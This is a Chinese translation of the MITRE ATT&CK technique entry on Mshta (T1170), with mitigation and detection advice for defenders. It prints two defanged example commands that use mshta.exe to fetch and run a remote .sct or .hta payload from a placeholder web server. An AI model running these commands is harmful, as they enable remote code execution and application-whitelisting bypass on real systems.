ATT&CK-CN V1.01 Last Update: 2019-11 [返回索引页]

译者: 林妙倩(清华大学网络研究院网络空间安全实习生)、戴亦仑(赛宁网安) 原创翻译作品,如果需要转载请取得翻译作者同意。

数据来源:ATT&CK Matrices

原文: https://attack.mitre.org/techniques/T1170

术语表: /attack/glossary

Mshta

Mshta.exe 是一个执行 Microsoft HTML 应用程序 (HTA) 的实用程序。 HTA 文件的扩展名是 .hta。 HTAs 是独立的应用程序,使用与 Internet Explorer 的相同模型和技术执行,但不在浏览器内。

攻击者可以使用 mshta.exe 通过受信任的 Windows 实用程序代理执行恶意。hta 文件和 Javascript 或 VBScript。 已有几个在初始攻击和代码执行阶段利用 mshta.xe 的不同类型的威胁样例。 文件可以由 mshta.exe 通过内联脚本执行:mshta vbscript:Close(Execute(“GetObject(”“script:https[:]//webserver/payload[.]sct”“)”)) 也可以直接通过 URL: mshta http[:]//webserver/payload[.]hta 执行 Mshta.exe 可用于绕过允许其运行的应用程序白名单解决方案。 因为 mshta.exe 在 Internet Explorer 的安全上下文外执行,它还绕过浏览器的安全设置。

缓解

Mshta.exe 在给定的环境中可能不是必需的,因为它的功能与旧版 Internet Explorer 相关联,而这些已经过时了。 如果给定的系统或网络不需要 mshta.exe,配置应用程序白名单来拦截 mshta.exe 执行,防止攻击者潜在的滥用。

检测

使用进程监视来监视 mshta.exe 的执行和参数。 在命令行中查找 mshta.exe 执行原始或混淆的脚本。 将 mshta.exe 的最近调用与之前的已知良好参数调用和已执行的二进制文件进行比较,以确定异常和潜在的攻击活动。 mshta.exe 调用前后使用的命令参数也可能有助于确定执行的二进制文件的来源和目的。 监控 HTA 文件的使用。 如果它们通常不在环境中使用,那么执行它们可能是可疑的。